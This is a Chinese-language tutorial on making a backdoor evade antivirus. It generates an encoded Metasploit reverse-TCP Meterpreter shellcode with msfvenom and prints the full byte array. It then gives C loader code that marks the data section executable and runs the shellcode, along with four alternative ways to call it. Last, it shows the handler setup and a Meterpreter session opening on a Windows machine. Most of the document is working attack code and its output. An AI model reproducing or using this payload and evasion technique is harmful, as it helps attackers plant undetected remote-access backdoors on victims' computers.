众所周知,目前的杀毒软件的杀毒原理主要有三种方式,一种基于特征,一种基于行为,一种基于云查杀,其中云查杀的一些特点基本上也可以概括为特征码查杀,不管是哪一种杀毒软件,都会检查PE文件头,尤其是当后门程序越大时,越容易被查杀。
接下来我们将使用ShellCode和执行器分离的方式来实现免杀
通过C语言编译后门
1.首先使用msfvenom命令生成一句简短的shellcode,这里指定连接地址为IP=192.168.1.7,PORT=8888,当执行shellcode生成命令时屏幕会输出一些十六进制的文本,这些文本其实是机器码的编码形式,以下是对参数的解释.
[root@localhost ~]# msfvenom -a x86 --platform Windows \
> -p windows/meterpreter/reverse_tcp \
> -b '\x00\x0b' LHOST=192.168.1.7 LPORT=8888 -f c
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of c file: 1571 bytes
unsigned char buf[] =
"\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1"
"\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c"
"\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04"
"\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93"
"\x29\xa5\x7c\x73\x10\x66\x71\x72\x55\x9b\x78\x26\x0e\xd7\x2f"
"\xd7\x3b\xad\xf3\x5c\x77\x23\x74\x80\xcf\x42\x55\x17\x44\x1d"
"\x75\x99\x89\x15\x3c\x81\xce\x10\xf6\x3a\x24\xee\x09\xeb\x75"
"\x0f\xa5\xd2\xba\xe2\xb7\x13\x7c\x1d\xc2\x6d\x7f\xa0\xd5\xa9"
"\x02\x7e\x53\x2a\xa4\xf5\xc3\x96\x55\xd9\x92\x5d\x59\x96\xd1"
"\x3a\x7d\x29\x35\x31\x79\xa2\xb8\x96\x08\xf0\x9e\x32\x51\xa2"
"\xbf\x63\x3f\x05\xbf\x74\xe0\xfa\x65\xfe\x0c\xee\x17\x5d\x58"
"\xc3\x15\x5e\x98\x4b\x2d\x2d\xaa\xd4\x85\xb9\x86\x9d\x03\x3d"
"\x9f\x8a\xb3\x91\x27\xda\x4d\x12\x57\xf2\x89\x46\x07\x6c\x3b"
"\xe7\xcc\x6c\xc4\x32\x78\x67\x52\x7d\xd4\x76\xa5\x15\x26\x79"
"\x8b\x5d\xaf\x9f\x9b\xcd\xff\x0f\x5c\xbe\xbf\xff\x34\xd4\x30"
"\xdf\x25\xd7\x9b\x48\xcf\x38\x75\x20\x78\xa0\xdc\xba\x19\x2d"
"\xcb\xc6\x1a\xa5\xf9\x37\xd4\x4e\x88\x2b\x01\x29\x72\xb4\xd2"
"\xdc\x72\xde\xd6\x76\x25\x76\xd5\xaf\x01\xd9\x26\x9a\x12\x1e"
"\xd8\x5b\x22\x54\xef\xc9\x0a\x02\x10\x1e\x8a\xd2\x46\x74\x8a"
"\xba\x3e\x2c\xd9\xdf\x40\xf9\x4e\x4c\xd5\x02\x26\x20\x7e\x6b"
"\xc4\x1f\x48\x34\x37\x4a\xca\x33\xc7\x08\xe5\x9b\xaf\xf2\xb5"
"\x1b\x2f\x99\x35\x4c\x47\x56\x19\x63\xa7\x97\xb0\x2c\xaf\x12"
"\x55\x9e\x4e\x22\x7c\x7e\xce\x23\x73\x5b\xe1\x5e\xfc\x5c\x02"
"\x9f\x14\x39\x03\x9f\x18\x3f\x38\x49\x21\x35\x7f\x49\x16\x46"
"\xca\xec\x3f\xcd\x34\xa2\x40\xc4";
-a #指定payload目标框架
--platform #指定payload的目标平台
-p, --payload #指定需要使用的payload(攻击荷载)
-f, --format #指定输出格式 (使用 --help-formats 来获取msf)
-b '\x00\x0b' #规避特殊字符串2.将上面的ShellCode代码复制下来,打开VS Express编译器,并写以下C代码,这里使用内联汇编的形式调用这段ShellCode代码.
#include <stdio.h>
#include <windows.h>
//#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") // 隐藏控制台窗口显示
#pragma comment(linker,"/INCREMENTAL:NO") // 减小编译体积
#pragma comment(linker, "/section:.data,RWE") // 启用数据段可读写
unsigned char shellcode[] =
"\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1"
"\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c"
"\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04"
"\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93"
"\x29\xa5\x7c\x73\x10\x66\x71\x72\x55\x9b\x78\x26\x0e\xd7\x2f"
"\xd7\x3b\xad\xf3\x5c\x77\x23\x74\x80\xcf\x42\x55\x17\x44\x1d"
"\x75\x99\x89\x15\x3c\x81\xce\x10\xf6\x3a\x24\xee\x09\xeb\x75"
"\x0f\xa5\xd2\xba\xe2\xb7\x13\x7c\x1d\xc2\x6d\x7f\xa0\xd5\xa9"
"\x02\x7e\x53\x2a\xa4\xf5\xc3\x96\x55\xd9\x92\x5d\x59\x96\xd1"
"\x3a\x7d\x29\x35\x31\x79\xa2\xb8\x96\x08\xf0\x9e\x32\x51\xa2"
"\xbf\x63\x3f\x05\xbf\x74\xe0\xfa\x65\xfe\x0c\xee\x17\x5d\x58"
"\xc3\x15\x5e\x98\x4b\x2d\x2d\xaa\xd4\x85\xb9\x86\x9d\x03\x3d"
"\x9f\x8a\xb3\x91\x27\xda\x4d\x12\x57\xf2\x89\x46\x07\x6c\x3b"
"\xe7\xcc\x6c\xc4\x32\x78\x67\x52\x7d\xd4\x76\xa5\x15\x26\x79"
"\x8b\x5d\xaf\x9f\x9b\xcd\xff\x0f\x5c\xbe\xbf\xff\x34\xd4\x30"
"\xdf\x25\xd7\x9b\x48\xcf\x38\x75\x20\x78\xa0\xdc\xba\x19\x2d"
"\xcb\xc6\x1a\xa5\xf9\x37\xd4\x4e\x88\x2b\x01\x29\x72\xb4\xd2"
"\xdc\x72\xde\xd6\x76\x25\x76\xd5\xaf\x01\xd9\x26\x9a\x12\x1e"
"\xd8\x5b\x22\x54\xef\xc9\x0a\x02\x10\x1e\x8a\xd2\x46\x74\x8a"
"\xba\x3e\x2c\xd9\xdf\x40\xf9\x4e\x4c\xd5\x02\x26\x20\x7e\x6b"
"\xc4\x1f\x48\x34\x37\x4a\xca\x33\xc7\x08\xe5\x9b\xaf\xf2\xb5"
"\x1b\x2f\x99\x35\x4c\x47\x56\x19\x63\xa7\x97\xb0\x2c\xaf\x12"
"\x55\x9e\x4e\x22\x7c\x7e\xce\x23\x73\x5b\xe1\x5e\xfc\x5c\x02"
"\x9f\x14\x39\x03\x9f\x18\x3f\x38\x49\x21\x35\x7f\x49\x16\x46"
"\xca\xec\x3f\xcd\x34\xa2\x40\xc4";
int main(int argc, char **argv)
{
__asm
{
lea eax, shellcode
call eax
}
return 0;
}此外出去上面的这种汇编形式,这里我也整理了其他的一些调用ShellCode的代码.
//第1种方法
void RunShellCode_2()
{
((void(*)(void))&shellcode)();
}
//第2种方法
void RunShellCode_3()
{
__asm
{
lea eax, shellcode;
jmp eax;
}
}
//第3种方法
void RunShellCode_4()
{
__asm
{
mov eax, offset shellcode;
jmp eax;
}
}
//第4种方法
void RunShellCode_5()
{
__asm
{
mov eax, offset shellcode;
_emit 0xFF;
_emit 0xE0;
}
} 3.在MFS控制主机,启动侦听程序.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > set lhost 192.168.1.7
lhost => 192.168.1.7
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.7:8888启动我们的shellcode代码,就可看到反弹回一个shell.
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.7:8888
[*] Sending stage (179779 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.7:8888 -> 192.168.1.2:36805) at 2019-03-20 00:03:41 -0400
meterpreter > sysinfo
Computer : lyshark
OS : Windows 10 (Build 19999).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >